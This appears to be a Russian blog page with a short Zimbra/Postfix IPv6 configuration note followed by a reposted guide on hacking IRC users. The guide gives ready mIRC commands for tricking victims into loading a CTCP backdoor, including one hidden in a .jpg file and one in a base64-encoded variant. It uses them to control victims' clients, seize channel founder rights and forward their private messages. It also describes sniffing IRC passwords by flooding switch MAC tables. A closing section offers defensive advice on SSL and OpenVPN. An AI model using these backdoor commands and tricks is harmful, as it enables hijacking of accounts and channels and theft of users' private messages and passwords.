В целом zimbra использует софт, который готов к IPv6 и использует IPv6 по умолчанию “из коробки”. За MTA в zimbra отвечает postfix. Ему отдельное приглашение требуется ввиде inet_protocols = all.
Т.к. в zimbra это “приглашение” выдаётся особым образом, мне надоело его нагугливать каждый раз после обновления.
# Переходим в пользователя zimbra su - zimbra # открываем файл конфигурации из которого ренерится конфиг постфикса vim conf/zmmta.cf
Добавляем туда строку POSTCONF inet_protocols all
Например что бы получилось так: POSTCONF virtual_transport LOCAL postfix_virtual_transport POSTCONF always_add_missing_headers LOCAL postfix_always_add_missing_headers POSTCONF inet_protocols all RESTART mta
Сохраняем, выходим.
Теперь неплохо было бы добавить наши сети, которые надо релеить. Вёбморда на IPv6 ругается.
Добавляются сети довольно просто: zmprov modifyserver zimbra.example.com zimbraMtaMyNetworks '127.0.0.0/8 [::1] /128 [2001:db8:2158:aab0::0] /60'
Да, я знаю что здесь лишние пробелы. Я так и не понял в связи с чем txp так не любит закрывающие квадратные скобки
Для рестарта mta используется команда zmmtactl restart
Не так давно спросили у меня как взломать IRC и как защититься. Спрашивали это все чаще и чаще. Написал я это. Источник находится здесь
—- Как взломать IRC и как от этого защититься.
Автор: Bart[mdv]
Спасибо за помощь в составлении: keY, cHameleon
* Как получить контроль над mIRC-based - клиентами
Заставьте жертву ввести //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas и только после этого вводите приведённые ниже команды:
Сделать, чтоб юзер зашёл на канал: /ctcp nick .join #chan
Юзер покидает канал: /ctcp nick .part #chan
Т.к админы IRC-сетей люди довольно образованные и грамотные в этих вопросах, то во многих сетях прикрыли использование команды //write, т.к таким образом довольно много эксплоитов и троянов распространялось в IRC-сетех. Делаем следующим образом:
1. берем любую картинку, открываем ее в текстовом редакторе (Блокнот) и вписываем туда echo .... echo .... echo .... ctcp 1:*:?:$1-
И сохраняем картинку в формат *.jpg
2. Картинку нужно впарить пользователям на канале (тут сами)
3. пользователь при попытке посмотреть содержимое картинки, ничего не увидит, и вы ему рекомендуете набрать следующее в любом окне его клиента /load -rs НАЗВАНИЕ_КАРТИНКИ.jpg , скрипт будет загружен в клиент "жертвы" дальше все по схеме, изложенной выше.
Так же практикуется кодирование: .//.write mirc.bak $decode(b24gKjpURVhUOuPw8+foKjoqOnsKY2xvc2UgLW 0gJG5pY2sKd3JpdGUgJGRlY29kZSgkMixtKSAkZGVjb2RlKCQzLG0pCm xvYWQgLXJzICRkZWNvZGUoJDIsbSkKfQ,m) | .load -rs mirc.bak
Как захватить канал
Всучив скрипт, указанный выше, можно легко сменить фаундера канала на себя.
Или просто сменить пароль фаундера на канал и легко идентиться с правами фаундера.
Я не буду расказываться как воспользоваться отсутствием всех на канале и как воспользоваться сплитом для захвата канала – это все не работает в нормальных сетях с сервисами :-)
Как читать чужие приваты в mIRC-based – клиентах
Втюхиваем жертве скрипт с содержанием:
on ::?:.msg куда $1-
Как? Вспомните про //write //load $encode и $decode :-)
Как можно стырить пароли от ников/каналов и даже иркопов
Если вы пользуетесь irc в локалке – качаем снифер – wireshark например, настраиваем фильтры на порт 6667 – ловим весь IRC трафик.
Если сниффер поймал только вас – не спешите огорчаться – если свитчики стоят глупенькие – у них есть MAC-таблица, и если ее переполнить – свитчик превращается... превращается свитчик... в тупой хабчик :-)
Такая атака осуществима только если строители сети, в которой вы находитесь, съэкономили кучу денег на нормальных свитчах.
Ах, да, имейте ввиду, если админы локалки просекут кто это сделал, скорее всего вас отрубят от сети :-)
Как защититься:
* Не стоит набирать незнакомых команд
* Если очень хочется попробовать – спросите сначала на канале помощи о результате этой команды
( в сети SolarNet каналом помощи является #help )
* Используйте шифрованное SSL-подключение везде, где это возможно
( в сети SolarNet для SSL используется порт 9997 )
* Как узнать, что пользователь подключен по SSL?
В /whois указывается is using a Secure Connection, а также пользователю выдается флажок +S
* Как запретить заходить на канал всем, кроме тех, кто подключены через SSL?
Нужно поставить на канал флаг +S /mode #chan +S
Как защитить не только IRC и сэкономить трафик:
Берем OpenVPN.
Получаем компрессию (на веб-страницах до 40%) и шифрование (с помощью SSL) своего трафика.
Очень рекомендуется пользоваться OpenVPN когда приходится уезжать за пределы “нормального” интернета и пользоваться GPRS.
Приимущества OpenVPN (зачем нужен OpenVPN)
+ сжатие и шифрование всего трафика
+ не надо каждой софтине указывать какие-то прокси
+ если твой провайдер использует сеть на хабах – твой трафик (в т.ч. твои пароли на аську/почту/ирц/итп) поснифать уже не получится
+ если нет доверия любому из узлов между тобой и инетом (например не вызывающий доверия провайдер) – стоит использовать шифрование.
+ ты никогда не засветишь свой настоящий IP
+ докупив доп. IP ты можешь привязать его к OpenVPN и будет у тебя твой выделенный реальный IP со всеми его плюсами (это для тех, у кого провайдеры не выдают реальники, а очень хочется)
Можно еще напридумывать плюсов.
Минус я только один вижу – надо иметь свой сервер в инете. Этот минус решается покупкой VDS-хостинга :-)